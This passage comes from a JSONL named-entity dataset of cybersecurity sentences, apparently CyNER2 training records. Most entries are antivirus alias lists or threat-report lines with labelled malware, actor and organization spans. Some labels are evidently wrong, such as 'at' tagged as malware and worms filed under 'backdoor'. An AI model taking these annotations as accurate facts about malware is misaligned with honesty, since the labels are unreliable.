Tool.BtcMine.1051 BehavesLike.Win32.Ransomware.th W32.Trojan.Qhost RiskWare/Win32.BitMiner.h Trojan.Forcud", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000318", "source": "cyner2_train"}} {"text": "While it has become common to see new ransomware variants being distributed daily, it is not as common to find new ransomware infections being distributed via exploit kits.", "spans": {"MALWARE: ransomware": [[38, 48], [115, 125]], "MALWARE: exploit kits.": [[159, 172]]}, "info": {"id": "cyner2_train_000319", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.1FBC Win32.Trojan.WisdomEyes.16070401.9500.9950 Win.Exploit.Countdown-1 BackDoor.Meterpreter.37 Troj.W32.Jorik.Skor.lrUS Trojan:Win64/Meterpreter.A Trojan/Win32.Swrort.C695042", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000320", "source": "cyner2_train"}} {"text": "We previously highlighted the dangers of installing apps that enable IAPs using SMS messages, as these apps typically have access to all SMS messages sent to the phone.", "spans": {"VULNERABILITY: that enable IAPs using SMS messages,": [[57, 93]], "VULNERABILITY: access to all SMS messages": [[123, 149]]}, "info": {"id": "cyner2_train_000321", "source": "cyner2_train"}} {"text": "U.S. Allies and Rivals Digest Trump's Victory - Carnegie Endowment for International Peace.docm", "spans": {"ORGANIZATION: U.S. 
Allies": [[0, 11]], "ORGANIZATION: Rivals Digest Trump's Victory": [[16, 45]]}, "info": {"id": "cyner2_train_000322", "source": "cyner2_train"}} {"text": "During the course of our research, it became evident that this actor had not built uWarrior from scratch, but rather opted to borrow components from several off-the-shelf tools.", "spans": {"ORGANIZATION: actor": [[63, 68]], "MALWARE: uWarrior": [[83, 91]], "MALWARE: off-the-shelf tools.": [[157, 177]]}, "info": {"id": "cyner2_train_000325", "source": "cyner2_train"}} {"text": "Hackers made a modified Linux Mint ISO, with a backdoor in it, and managed to hack the Linux Mint website to point to it.", "spans": {"THREAT_ACTOR: Hackers": [[0, 7]], "SYSTEM: Linux Mint ISO,": [[24, 39]], "MALWARE: backdoor": [[47, 55]]}, "info": {"id": "cyner2_train_000326", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.BindFile!O Trojan/Dropper.BindFile.a W32/Dropper.LIP Trojan.Spy-681 Trojan-Dropper.Win32.BindFile.e Trojan.Win32.BindFile.dcyo Trojan.Win32.BindFile.188416 PE:Dropper.BindFile.h!1173781522 TrojWare.Win32.TrojanDropper.BindFile.A Trojan.Progress.10 TrojanDropper.ExeBind.Mfc2 Dropper/Bindfile.496648 W32/Risk.SLHR-7237 Win32/TrojanDropper.BindFile.A Trojan-Dropper.Win32.BindFile W32/BindFile.A!tr Trojan.Win32.BindFile.bA", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000328", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Kryptik.aspo JAVA_EXPLOIT.TCC JAVA_EXPLOIT.TCC Win.Trojan.Hydraq-219 Exploit.Java.CVE20131493.cqvzpg Java.S.EX-CVE-2013-1493.206981 Exploit.Java.509 EXP/Java.HLP.JM W32/Kryptik.ASPO Trojan.Graftor.D13511 Exploit.Java.CVE-2013-1493 Java/Exploit.CVE-2013-1493.AL Unk.Win32.Script.400440 Trojan.Plugax!dr/f2r5A7aY Exploit.Java.HLP virus.java.cve-2013-1493.c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000330", "source": "cyner2_train"}} {"text": "We have seen Angler to be using bedep as its 
payload but adding vawtrak in its arsenal is something we haven't seen in the past until recently.", "spans": {"MALWARE: Angler": [[13, 19]], "MALWARE: bedep": [[32, 37]], "MALWARE: payload": [[45, 52]], "MALWARE: vawtrak": [[64, 71]]}, "info": {"id": "cyner2_train_000331", "source": "cyner2_train"}} {"text": "Attackers have been able to successfully implant JavaScript code on the login pages that enables them to surreptitiously steal employee credentials as they login to access internal corporate resources.", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]]}, "info": {"id": "cyner2_train_000332", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dropper BKDR_QBOT.SM Win32.Trojan-Dropper.Small.s Win32/Qakbot.KR BKDR_QBOT.SM Trojan.Win32.Gamania.tghgw Trojan.Win32.A.Mbro.191488 Trojan.PWS.Gamania.36525 W32/Trojan.XMWQ-0223 Trojan[Backdoor]/Win32.QBot TrojanDropper:Win32/Qakbot.A Dropper/Win32.Injector.R30051 Win32/TrojanDropper.Small.NMS Trojan.Kryptik!nABTr99RVjs Backdoor.Win32.Qakbot W32/Dropper.NMS!tr Win32/Trojan.a58", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000335", "source": "cyner2_train"}} {"text": "As of September 17th Dyreza now counts an additional twenty organizations directly involved in Fulfillment and Warehousing; four software companies that support Fulfillment and Warehousing; five Wholesale Computer Distributors; and its credential theft triggers include Apple, Iron Mountain, OtterBox and Badge Graphics Systems and many other well-known consumer- and business-facing technology and service brands.", "spans": {"MALWARE: Dyreza": [[21, 27]], "ORGANIZATION: organizations": [[60, 73]], "ORGANIZATION: Fulfillment": [[95, 106], [161, 172]], "ORGANIZATION: Warehousing;": [[111, 123], [177, 189]], "ORGANIZATION: software companies": [[129, 147]], "ORGANIZATION: Wholesale Computer Distributors;": [[195, 227]], "ORGANIZATION: Apple, Iron Mountain, OtterBox": [[270, 300]], "ORGANIZATION: Badge Graphics Systems": 
[[305, 327]], "ORGANIZATION: consumer-": [[354, 363]], "ORGANIZATION: business-facing technology": [[368, 394]], "ORGANIZATION: service brands.": [[399, 414]]}, "info": {"id": "cyner2_train_000338", "source": "cyner2_train"}} {"text": "This malware possesses the ability to Collect information about an infected computer and transfer it to the command and control server.", "spans": {"MALWARE: malware": [[5, 12]], "SYSTEM: infected computer": [[67, 84]]}, "info": {"id": "cyner2_train_000339", "source": "cyner2_train"}} {"text": "Malware isn't usually thought to be old, but a recent phishing campaign using the MyDoom worm has shown that old tools can still be used to lure users into malware.", "spans": {"MALWARE: Malware": [[0, 7]], "THREAT_ACTOR: phishing campaign": [[54, 71]], "MALWARE: the MyDoom worm": [[78, 93]], "MALWARE: malware.": [[156, 164]]}, "info": {"id": "cyner2_train_000340", "source": "cyner2_train"}} {"text": "SSL is typically used to encrypt data between the client and the server, thus making the content unreadable by any systems sitting between the two end points, and significantly raising the cost of defence.", "spans": {}, "info": {"id": "cyner2_train_000342", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Zapchast.113152 Backdoor.KeyBoy Trojan.Zapchast.Win32.29227 Trojan.Heur.LP.EDDB38 Win32.Trojan.WisdomEyes.151026.9950.9999 Backdoor.Kboy Trojan.Win32.Zapchast.afhn Trojan.Win32.Zapchast.cjltha Win32.Trojan.Zapchast.Htcu BehavesLike.Win32.GameVance.ch Trojan/Zapchast.iik TR/Spy.113152.29 Trojan/Win32.Zapchast Backdoor.Win32.KeyBoy.113152[h] Win-Trojan/Keyboy.113152 Trojan.Win32.Zapchast.afhn Trojan.Zapchast!0ThicNhZU3g Trojan.Win32.Zapchast W32/Zapchast.AFHN!tr Win32/Trojan.020", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000343", "source": "cyner2_train"}} {"text": "Bot communicates with the botmaster using non-standard protocol built on top of TCP.", "spans": {"MALWARE: Bot": [[0, 3]], 
"MALWARE: botmaster": [[26, 35]]}, "info": {"id": "cyner2_train_000344", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.QQKiller.183808 Trojan.Qqkiller.A Trojan.QQKiller.Win32.2 Trojan.Qqkiller.A Trojan/QQKiller.a Trojan.QQKiller!Y2SikmBtqEk Win32/QQKiller.A TROJ_QQKILLER.A Trojan.Win32.QQKiller.a Trojan.Win32.QQKiller.erxn Trojan.Win32.A.QQKiller.183808[h] Trojan.Qqkiller.A TrojWare.Win32.QQKiller.A Trojan.Qqkiller.A Trojan.Nudeq TROJ_QQKILLER.A BehavesLike.Win32.HLLPPhilis.cc W32/Trojan.ELFE-7308 Trojan/Win32.QQKiller TR/QQKiller.2 W32/GWGhost.A!tr Trojan/Win32.QQKiller Trojan.Qqkiller.A Troj.W32.QQKiller.a!c Win-Trojan/QQKiller.183808 Trojan.QQKiller Win32.Trojan.Qqkiller.Szkz Trojan.Win32.QQKiller Trojan.Qqkiller.A Trojan.Win32.QQKiller.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000345", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Duqu.24960.B Trojan.Win32.Duqu!O Trojan/Duqu.a Trojan.Duqu.1 Win32.Trojan.WisdomEyes.16070401.9500.9896 W32/Duqu.C W32.Duqu Win32/Duqu.A RTKT_DUQU.SME Win.Trojan.Duqu-7 Trojan.Win32.Duqu.a Trojan.Win32.Duqu.eorzg Trojan.Win32.Duqu.24960 TrojWare.Win32.Duqu.A Trojan.Duqu.2 Trojan.Duqu.Win32.2 RTKT_DUQU.SME W32/Duqu.BOQU-9196 Trojan/Duqu.b TR/Duqu.A.1 Trojan/Win32.Duqu Trojan:WinNT/Duqu.B Troj.W32.Duqu.a!c Trojan.Win32.Duqu.a Trojan/Win32.Duqu.R13984 Trojan.Duqu.2102 Win32/Duqu.A Win32.Trojan.Duqu.Pjnh Trojan.Duqu!o6SU6/Pq/F4 Trojan.Win32.Duqu W32/Duqu.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000346", "source": "cyner2_train"}} {"text": "The malware takes these steps : Check if the system master boot record ( MBR ) contains an infection marker ( 0xD289C989C089 8-bytes value at offset 0x2C ) , and , if so , terminate itself Check again if the process is attached to a debugger ( using the techniques described previously ) Read , decrypt , and map the stage 5 malware ( written in the previous stage in msvcr90.dll 
) Open winlogon.exe process Load user32.dll system library and read the KernelCallbackTable pointer from its own process environment block ( PEB ) ( Note : The KernelCallbackTable points to an array of graphic functions used by Win32 kernel subsystem module win32k.sys as call-back into user-mode .", "spans": {}, "info": {"id": "cyner2_train_000348", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader.Win32.Gamarue.2!O Trojan.Shamoon.1 trojan.win32.skeeyah.a!bit Win32.Trojan.WisdomEyes.16070401.9500.9991 W32.Disttrack.B WORM_DISTTRACK.SMC Win.Dropper.DistTrack-5744784-0 Backdoor.Win32.RemoteConnection.d Trojan.Win32.RemoteConnection.ekxrsg WORM_DISTTRACK.SMC Backdoor.RemoteConnection.a Trojan[Backdoor]/Win32.RemoteConnection Trojan:Win32/Depriz.E!dha Backdoor/Win32.RemoteConnection.C1761738 Backdoor.RemoteConnection!lEVCTonUnuw Trojan.Win32.Depriz Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000351", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Winsy Trojan.Win32.Winsy Trojan.Winsy Trojan.Winsy W32/Trojan.MBSD-8108 Trojan.Winsy Trojan.Win32.Winsy Trojan.Winsy Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000354", "source": "cyner2_train"}} {"text": "The DGA hosted site further serves up a list of domains that are cycled through for C2.", "spans": {}, "info": {"id": "cyner2_train_000355", "source": "cyner2_train"}} {"text": "Today's blog reviews recent activity from these EITest HoeflerText popups on August 30, 2017 to discover more about this recent change.", "spans": {}, "info": {"id": "cyner2_train_000359", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Exploit.DebPloit.A Trojan-Exploit/W32.DebPloit.45056 Exploit.DebPloit.Win32.4 Trojan/Exploit.DebPloit Trojan.Exploit.DebPloit.A Trojan.Exploit.DebPloit.A Exploit.DebPloit!VRtQm5q2mnY TROJ_DEPLOIT.A Exploit.Win32.DebPloit Exploit.Win32.DebPloit.yfoid 
Exploit.DebPloit.45056[h] Trojan.Exploit.DebPloit.A TrojWare.Win32.Exploit.DebPloit Trojan.Exploit.DebPloit.A BackDoor.Bifrost.634 TROJ_DEPLOIT.A W32/Risk.CTWU-4612 Exploit.WinNT.DebPloit Trojan[Exploit]/Win32.DebPloit WinNT.Hack.DebPloit.kcloud Win-Trojan/Debploit.45056.B Trojan.Exploit.DebPloit.A Trojan.Exploit.DebPloit.A Win32/Exploit.DebPloit Win32.Exploit.Debploit.Wptu W32/Debploit.B!tr Exploit.OY Trojan.Win32.DebPloit.aa Win32/Trojan.Exploit.672", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000360", "source": "cyner2_train"}} {"text": "Around New Year, the Emsisoft Lab team was alerted to the presence of a new Globe variant, Globe3, which was infecting users using a new mode of operation.", "spans": {"ORGANIZATION: Emsisoft Lab team": [[21, 38]], "MALWARE: Globe": [[76, 81]], "MALWARE: Globe3,": [[91, 98]], "ORGANIZATION: users": [[119, 124]]}, "info": {"id": "cyner2_train_000361", "source": "cyner2_train"}} {"text": "The DNS protocol is unlikely to be blocked allowing free communications out of the network and its use is unlikely to raise suspicion among network defenders.", "spans": {"SYSTEM: DNS": [[4, 7]], "VULNERABILITY: protocol is unlikely to be blocked": [[8, 42]], "VULNERABILITY: free communications out of the network": [[52, 90]]}, "info": {"id": "cyner2_train_000363", "source": "cyner2_train"}} {"text": "Phishing targeting Google Docs", "spans": {"SYSTEM: Google Docs": [[19, 30]]}, "info": {"id": "cyner2_train_000366", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Shiz.102400.S Backdoor.Win32.Shiz!O Backdoor/Shiz.fhrr Win32.Trojan.WisdomEyes.16070401.9500.9971 Win.Trojan.Shiz-787 Trojan.Win32.Shiz.whgln Trojan.KeyLogger.14845 Backdoor.Shiz.Win32.3116 BehavesLike.Win32.BadFile.cm Backdoor.Win32.Shiz Backdoor/Shiz.edz TR/Rogue.kdz.957021 Trojan[Backdoor]/Win32.Shiz Trojan.Zusy.D419A Trojan:Win32/Nahip.A Backdoor/Win32.Shiz.R34442 Win32/Spy.KeyLogger.NWE W32/KeyLogger.AFN!tr Backdoor.Shiz 
Win32/Trojan.460", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000367", "source": "cyner2_train"}} {"text": "In one case, the casino website was a direct gateway to Angler EK.", "spans": {"MALWARE: Angler EK.": [[56, 66]]}, "info": {"id": "cyner2_train_000370", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.JS.Redirector.xb Js.Trojan.Redirector.Amwl JS/BlacoleRef.CZ.26 Trojan/JS.Redirector.xb Trojan.JS.Redirector.xb Exploit.JS.Blacole JS/Iframe.WOR!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000374", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Aphexdoor.Litesock.A Backdoor/W32.Aphexdoor.23040 Trojan.Suckspro Backdoor.Aphexdoor.Win32.24 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Backdoor.YGRL-7760 Backdoor.Trojan Win32/Porsux.A Win.Trojan.Aphexdoor-8 Backdoor.Aphexdoor.Litesock.A Backdoor.Win32.Aphexdoor.LiteSock Backdoor.Aphexdoor.Litesock.A Trojan.Win32.Aphexdoor.ebrvay Backdoor.W32.Aphexdoor.LiteSock!c Backdoor.Aphexdoor.Litesock.A Backdoor.Aphexdoor.Litesock.A BackDoor.LiteSock BehavesLike.Win32.Downloader.mm Backdoor.Win32.Aphexdoor.LiteSock W32/Backdoor2.EYIV Backdoor/Aphexdoor.LiteSock Trojan[Backdoor]/Win32.Aphexdoor Backdoor.Aphexdoor.Litesock.A Backdoor.Win32.Aphexdoor.LiteSock Worm/Win32.Fesber.C58465 Backdoor.Aphexdoor.Litesock.A BScope.Trojan.RSP Bck/Corsbot.B Win32.Backdoor.Aphexdoor.Airh Trojan.Suckspro!fID1dcqse2s W32/Aphexdoor.LITESOCK!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000375", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Win32.Chiviper!O Worm.AutoRun.14759 W32/AutoRun.sdc Win32.Trojan.WisdomEyes.16070401.9500.9975 WORM_OTORUN.SMIF Win.Trojan.Qhost-160 Worm.Win32.Chiviper.gk Trojan.Win32.AutoRun.onby Trojan.AVKill.11726 Worm.AutoRun.Win32.23223 WORM_OTORUN.SMIF BehavesLike.Win32.Ipamor.qt Worm.Win32.AutoRun WORM/Autorun.rmr win32.troj.onlinegamest.bc.kcloud 
Worm.Win32.Chiviper.gk Trojan/Win32.CSon.R2002 Worm.Chiviper Worm.AutoRun!t3rz8tcZQ1A W32/Chiviper.GK!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000377", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Zbot.7 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Kazy-50 Trojan.Win32.Pamela.hnatv Trojan.Win32.A.Inject.75189 DDoS.Pamela Trojan.Inject.Win32.17142 BehavesLike.Win32.Dropper.pc Trojan.Win32.Inject Trojan/Inject.mra Trojan/Win32.Inject Trojan:Win32/Pucodex.A Trojan-Injector.191245", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000378", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm/W32.Sober.135968 Packed.Win32.TDSS!O Worm.Sober.Win32.7 WORM_SOBER.AM Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Sober.DVXC-4063 W32.Sober.W@mm Win32/Sober.T WORM_SOBER.AM Win.Worm.Sober-43 Email-Worm.Win32.Sober.x Trojan.Win32.Sober.fxvm I-Worm.Win32.Sober.T Packer.W32.Tibs.l4Hz Worm.Win32.Sober.V Win32.HLLM.Sober BehavesLike.Win32.Autorun.cc Trojan.Win32.Pasta W32/Sober.V@mm I-Worm/Sober.p DR/Sober.T Worm[Email]/Win32.Sober Worm.Sober.t.kcloud Worm:Win32/Sober.Y@mm.dr Email-Worm.Win32.Sober.x Dropper/Win32.Sober.R86508 W32/Sober.s.dr TScope.Trojan.VB W32/Sober.AE.worm Win32/Sober.V Win32.Worm-email.Sober.Akew I-Worm.Sober.AF1 W32/Sober.T@mm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000379", "source": "cyner2_train"}} {"text": "Proofpoint is tracking this attacker, believed to operate out of China, as TA459", "spans": {"ORGANIZATION: Proofpoint": [[0, 10]], "THREAT_ACTOR: attacker,": [[28, 37]], "THREAT_ACTOR: TA459": [[75, 80]]}, "info": {"id": "cyner2_train_000381", "source": "cyner2_train"}} {"text": "360 Network Security Research Lab recently discovered a new botnet that is scanning the entire Internet on a large scale.", "spans": {"ORGANIZATION: 360 Network Security Research Lab": [[0, 33]], "MALWARE: botnet": [[60, 66]]}, "info": 
{"id": "cyner2_train_000384", "source": "cyner2_train"}} {"text": "The malware has existed since at least 2012, with threat actors using it for mass-spreading malware campaigns and for ongoing targeted attacks.", "spans": {"MALWARE: malware": [[4, 11]], "THREAT_ACTOR: threat actors": [[50, 63]], "THREAT_ACTOR: mass-spreading malware campaigns": [[77, 109]]}, "info": {"id": "cyner2_train_000387", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.CareFree.a Win32/Tnega.TaRMRTC Trojan.Win32.Graftor.dogten Trojan.KillFiles.21059 BehavesLike.Win32.Downloader.mc TR/Graftor.cpoyxe Trojan.Ursu.D2DC2 Trojan/Win32.StartPage.R131400 Win32/Trojan.e36", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000390", "source": "cyner2_train"}} {"text": "This group has been active since at least 2014 and uses spear-phishing campaigns to target enterprises.", "spans": {"THREAT_ACTOR: group": [[5, 10]], "MALWARE: at": [[33, 35]], "THREAT_ACTOR: spear-phishing campaigns": [[56, 80]], "ORGANIZATION: target enterprises.": [[84, 103]]}, "info": {"id": "cyner2_train_000391", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9992 Trojan-Spy.MSIL.KeyLogger.ctnb Trojan.Win32.Z.Keylogger.91136.M Msil.Trojan-spy.Keylogger.Wqde Trojan.DownLoader9.24657 TrojanSpy.MSIL.vlt TR/Downloader.gldnp Trojan[Spy]/MSIL.KeyLogger Trojan.MSILPerseus.D9E17 Trojan-Spy.MSIL.KeyLogger.ctnb Backdoor:MSIL/Cooatut.A TrojanSpy.MSIL.KeyLogger Trj/CI.A MSIL/Troob.AA Trojan.MSIL.Troob MSIL/Troob.AA!tr Win32/Trojan.Spy.144", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000392", "source": "cyner2_train"}} {"text": "Instead, MacDownloader is a simple exfiltration agent, with broader ambitions.", "spans": {"MALWARE: MacDownloader": [[9, 22]]}, "info": {"id": "cyner2_train_000393", "source": "cyner2_train"}} {"text": "Throughout 2016, Proofpoint researchers tracked a cyber-espionage campaign targeting 
victims in Russia and neighboring countries.", "spans": {"ORGANIZATION: Proofpoint researchers": [[17, 39]], "THREAT_ACTOR: cyber-espionage campaign": [[50, 74]]}, "info": {"id": "cyner2_train_000394", "source": "cyner2_train"}} {"text": "This threat actor has been very active in February and March 2023 targeting individuals in various South Korean organizations.", "spans": {"THREAT_ACTOR: threat actor": [[5, 17]], "ORGANIZATION: individuals": [[76, 87]], "ORGANIZATION: South Korean organizations.": [[99, 126]]}, "info": {"id": "cyner2_train_000395", "source": "cyner2_train"}} {"text": "The Trojan is delivered in emails that mostly target corporate users.", "spans": {"MALWARE: The Trojan": [[0, 10]], "ORGANIZATION: corporate users.": [[53, 69]]}, "info": {"id": "cyner2_train_000396", "source": "cyner2_train"}} {"text": "We can trace activities of Pawn Storm back to 20041 and before our initial report in 2014 there wasn't much published about this actor group.", "spans": {"THREAT_ACTOR: Pawn Storm": [[27, 37]], "THREAT_ACTOR: actor group.": [[129, 141]]}, "info": {"id": "cyner2_train_000397", "source": "cyner2_train"}} {"text": "Backdoor.Win32.Denis uses DNS tunneling for communication", "spans": {}, "info": {"id": "cyner2_train_000398", "source": "cyner2_train"}} {"text": "A few days before the Kuala Lumpur summit, a subdomain under asean.org for the ASEAN Secretariat Resource Centre ARC was compromised.", "spans": {"ORGANIZATION: Kuala Lumpur summit,": [[22, 42]], "ORGANIZATION: the ASEAN Secretariat Resource Centre ARC": [[75, 116]]}, "info": {"id": "cyner2_train_000399", "source": "cyner2_train"}} {"text": "A backdoor also known as: Flooder.MailSpam.AnonMail.A Email-Flooder.Win32.AnonMail!O Win32.Trojan.Anonmail.Agkt Flooder.MailSpam.AnonMail.A W32/Backdoor.SPH Hacktool.Flooder Win.Tool.MailSpam-3 Email-Flooder.Win32.AnonMail.a Flooder.MailSpam.AnonMail.A Trojan.Win32.AnonMail.dbio TrojWare.Win32.Spammer.AnonMail Trojan.AnMail Tool.AnonMail.Win32.14 
Email-Flooder.Win32.AnonMail.A W32/Backdoor.CDAV-2869 Spammer.Mail.AnonMail TR/Nuker.AnonMail HackTool[Flooder]/Win32.AnonMail Email-Flooder.Win32.AnonMail.a Flooder.MailSpam.AnonMail.A Spammer.AnonMail Flooder.MailSpam.AnonMail.A Flooder.MailSpam.AnonMail.A Trj/CI.A Win32/Spammer.AnonMail", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000400", "source": "cyner2_train"}} {"text": "the type of operation they are carrying out.", "spans": {}, "info": {"id": "cyner2_train_000401", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Mlw.eweujb Win32.Trojan.Inject.Auto BehavesLike.Win32.Trojan.hh TR/Dropper.MSIL.fkvxc Spyware.InfoStealer Trojan.MSIL.Inject MSIL/Injector.SZD!tr Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000403", "source": "cyner2_train"}} {"text": "Little has been published on the threat actors responsible for Operation Ke3chang since the report was released more than two years ago.", "spans": {"THREAT_ACTOR: threat actors": [[33, 46]], "THREAT_ACTOR: Operation": [[63, 72]]}, "info": {"id": "cyner2_train_000405", "source": "cyner2_train"}} {"text": "A backdoor also known as: PUP.Optional.VideiPlayer Trojan.ExtenBro! TROJ_SPNR.06HH14 Trojan-Downloader.MSIL.ExtInstall.o Trojan.Win32.Kivat.dfxucy TROJ_SPNR.06HH14 BehavesLike.Win32.Trojan.nt W32/Trojan.JMSU-4938 Variant.Kazy.doi W32/ExtenBro.E!tr Trojan.Kazy.D683A9 Uds.Dangerousobject.Multi!c TrojanDownloader:MSIL/Kivat.B Trojan.ExtenBro! 
Trj/Chgt.B Win32/Trojan.Multi.daf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000407", "source": "cyner2_train"}} {"text": "Hashes of samples Type Package name SHA256 digest Custom ads com.targetshoot.zombieapocalypse.sniper.zombieshootinggame 5d98d8a7a012a858f0fa4cf8d2ed3d5a82937b1a98ea2703d440307c63c6c928 Click fraud com.counterterrorist.cs.elite.combat.shootinggame 84672fb2f228ec749d3c3c1cb168a1c31f544970fd29136bea2a5b2cefac6d04 Rooting trojan com.android.world.news bd233c1f5c477b0cc15d7f84392dab3a7a598243efa3154304327ff4580ae213 Zen trojan com.lmt.register eb12cd65589cbc6f9d3563576c304273cb6a78072b0c20a155a0951370476d8d Mobile Campaign ‘ Bouncing Golf ’ Affects Middle East We uncovered a cyberespionage campaign targeting Middle Eastern countries .", "spans": {"MALWARE: Zen": [[415, 418]], "MALWARE: Bouncing Golf": [[526, 539]]}, "info": {"id": "cyner2_train_000408", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.Kolweb.a.2.Pack Trojan/Delf.cf W32/Trojan.ORX Trojan.Kolweb.A W32/Startpage.AHU Win32/Startpage.LM TROJ_DOWNLOAD.E Trojan.Win32.Kolweb.a Trojan.Win32.Kolweb.A!IK TrojWare.Win32.Kolweb.A Trojan.DownLoader.1317 TROJ_DOWNLOAD.E Trojan/PSW.Almat.coi Adware:Win32/Adtomi.B Win-Spyware/Xema.171008 W32/Trojan.ORX Trojan.Win32.Kolweb.a Win32/Kolweb.A Trojan.Win32.Kolweb.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000411", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Crypt.ES Trojan.Crypt.ES Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan.Crypt.ES Trojan.Win32.Crypt.ewgrry Trojan.Crypt.ES Trojan.Crypt.ES BehavesLike.Win32.BadFile.lm Backdoor:Win32/Huceqoo.A Trojan.Win32.Z.Crypt.73728.BQ Trojan/Win32.Scar.C8074 Trojan.Crypt.ES BScope.Trojan.Dropper.we Trj/GdSda.A Trojan.Crypt.ES Win32/Trojan.b63", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000412", "source": "cyner2_train"}} {"text": "However, this also leaves the C C 
traffic open for monitoring by others, including security researchers.", "spans": {"ORGANIZATION: security researchers.": [[83, 104]]}, "info": {"id": "cyner2_train_000414", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Pws.Watcher.A Trojan-PSW.Win32.Watcher!O Trojan.Pws.Watcher.A Trojan.Pws.Watcher.A Trojan.Pws.Watcher.A Trojan.Win32.Watcher.ejkr Trojan.Win32.A.PSW-Watcher.492035 Troj.PSW32.W.Watcher.a!c Trojan.Pws.Watcher.A Trojan.Pws.Watcher.A Trojan.PWS.Watcher Trojan.Watcher.Win32.8 Trojan-PWS.Win32.Watcher.i Trojan/PSW.Watcher.a TR/PSW.Watcher.B PWS:Win32/Watcher.A Trojan.Pws.Watcher.A TrojanPSW.Watcher Win32/PSW.Watcher.A Win32.Trojan-qqpass.Qqrob.Wqwh W32/PSWAtcher.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000415", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.PSW.Barok.10 Trojan/W32.Barok.1056825 Trojan.Win32.Barok.bcusy W32/Pws.ZDD WS.Reputation.1 Barok.1_0 TROJ_BAROK.10 Trojan.Spy-11230 Trojan-PSW.Win32.Barok.10 Trojan.PSW.Barok.10 Trojan.PWS.Barok!QhmYol9M94M TrojWare.Win32.PSW.Barok.10 Trojan.PSW.Barok.10 TR/Barok.PSW.10 TROJ_BAROK.10 Trojan/PSW.Barok.10 Win32.Troj.Barok.kcloud PWS:Win32/Barok.1_0 Trojan.Win32.Barok_10.Setup Trojan.PSW.Barok.10 W32/Pws.ZDD Win-Trojan/Barok.Client.v10 PSW.Barok.A Hack.PSWbarok.10 Trojan-PWS.Win32.Barok.10 W32/Barok.10!tr.pws Trj/PSW.Barok.10", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000419", "source": "cyner2_train"}} {"text": "While the idea of malware as a service isn't a new one, with players such as Tox and Shark in the game, but it can be said that MacSpy is one of the first seen for the OS X platform.", "spans": {"MALWARE: malware": [[18, 25]], "THREAT_ACTOR: players": [[61, 68]], "MALWARE: Tox": [[77, 80]], "MALWARE: Shark": [[85, 90]], "MALWARE: MacSpy": [[128, 134]], "SYSTEM: OS X platform.": [[168, 182]]}, "info": {"id": "cyner2_train_000423", "source": "cyner2_train"}} {"text": "A backdoor also 
